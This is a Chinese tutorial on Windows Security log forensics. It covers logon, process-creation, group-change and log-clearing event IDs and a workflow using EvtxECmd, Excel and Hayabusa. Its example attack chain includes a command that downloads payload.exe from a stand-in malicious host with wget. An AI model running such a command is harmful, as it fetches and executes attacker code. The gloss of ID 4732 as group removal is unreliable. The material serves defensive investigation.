日志分析进阶——Windows安全日志
前面讲过Windows事件日志的框架,这篇深入讲安全日志——取证里最常用、价值最高的。
安全日志在C:\Windows\System32\winevt\Logs\Security.evtx。
必须记住的事件ID:
登录相关:
4624:登录成功。记录登录类型(2本地、3网络、10远程桌面)、用户名、源IP。
4625:登录失败。短时间大量出现→暴力破解。
4672:管理员登录。通常紧跟在4624后面。
4776:域控验证凭据(域环境用)。
进程创建:
4688:创建新进程。记录谁运行了什么程序、命令行参数。
权限变更:
4728/4732/4740:加入组/移除组/账户锁定。
分析实操步骤:
用EvtxECmd把.evtx解析成CSV,提取事件ID、时间、用户名、IP。
在Excel里打开,筛选出所有事件ID,统计分布——哪个ID特别多?
重点看4624和4625。找出所有登录失败的记录,有没有某个账户短时间大量失败?
追踪成功的登录记录(4624),看源IP是否可疑。
关联分析——可疑IP凌晨2点登录(4624),2点01分创建新进程(4688),运行wget http://malicious.com/payload.exe 。攻击者的操作就串起来了。
日志量太大:先做时间过滤,比如只看案发前后一天的数据。或者用Hayabusa,它内置检测规则,能自动标注“可疑”事件。
记住:安全日志被清空时会记录1102。如果日志有断档又没看到1102,可能是第三方工具清除了日志——这本身就是线索。104是系统日志或应用程序日志被清除时的ID,别搞混。日志默认UTC时间,注意时区。
浙公网安备 33010602011771号